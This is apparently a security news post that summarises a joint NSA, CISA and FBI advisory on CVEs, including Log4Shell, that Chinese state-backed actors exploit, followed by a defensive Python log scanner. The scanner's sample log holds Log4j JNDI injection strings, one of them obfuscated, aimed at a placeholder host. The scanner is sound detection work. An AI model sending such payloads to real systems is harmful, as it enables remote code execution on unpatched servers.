RCE on Log4j Among Top CVEs Exploited By Chinese-Backed Hackers

by CybrGPT

Chinese state-sponsored threat actors continue to exploit known vulnerabilities to target US and allied networks and companies, according to a new advisory published on October 06, 2022, by the US National Security Agency (NSA), Cybersecurity & Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI).

Worse, they use “an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations,” reads the joint advisory. 

As the hackers’ primary goals are “to steal intellectual property” and “to develop access into sensitive networks,” the three agencies found that they “continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access.”

They then exploit the vulnerabilities listed in the advisory to surreptitiously gain unauthorized access to sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks.

The US agencies also published the top 20 common vulnerabilities and exposures (CVEs) exploited by Chinese state-sponsored actors since 2020. Remote code execution (RCE) on Apache Log4j (CVE-2021-44228), Microsoft Exchange (CVE-2021-26855) and Atlassian (CVE-2022-26134) are among these, as well as arbitrary file upload in VMware vCenter Server (CVE-2021-22005).

The NSA, CISA and FBI further gave a list of recommendations for mitigating the risks:

  • Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this Cybersecurity Advisory (CSA) and other known exploited vulnerabilities
  • Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised
  • Block obsolete or unused protocols at the network edge
  • Upgrade or replace end-of-life devices
  • Move toward the Zero Trust security model
  • Enable robust logging of internet-facing systems and monitor the logs for anomalous activity
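As an added example (not from the advisory or this article) of the last recommendation applied to the Log4j CVE named above, here is a small Python scanner over constructed web-server log lines that flags JNDI lookup strings, including the nested-lookup obfuscation that Log4j 2 resolves before the outer lookup runs. The log lines, addresses and hostnames are made up.

```python
import re

# Constructed sample access-log lines (not real traffic): one benign request,
# one carrying a plain JNDI lookup string in the User-Agent field, and one
# where "jndi" and "ldap" are split across nested Log4j lookups.
SAMPLE_LOG = """\
203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"
203.0.113.7 - - "GET /api HTTP/1.1" 500 "${${lower:j}${upper:n}di:${::-l}dap://example.invalid/x}"
"""

# Log4j 2 evaluates ${lower:X} / ${upper:X} and the default-value form
# ${prefix:name:-X} before the enclosing lookup, so a naive search for the
# literal "${jndi:" misses the third line.  These two patterns collapse the
# innermost such lookups to the text they would produce.
_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Repeatedly resolve nested case/default lookups until nothing changes.

    The round limit keeps a pathological line from costing unbounded work.
    """
    for _ in range(max_rounds):
        new = _DEFAULT.sub(r"\1", _CASE.sub(r"\1", s))
        if new == s:
            return s
        s = new
    return s


def scan_log(text: str) -> list[dict]:
    """Return one record per line whose normalized form contains a JNDI lookup.

    'obfuscated' is True when normalization changed the line, which is itself
    a strong signal: legitimate clients do not send Log4j lookup syntax.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append({"line": lineno, "obfuscated": norm != line, "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same normalization can be applied before any other string-based rule, so a single literal-match alert covers the evasion variants as well as the plain form.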


© 2025 cybrgpt.com – All rights reserved.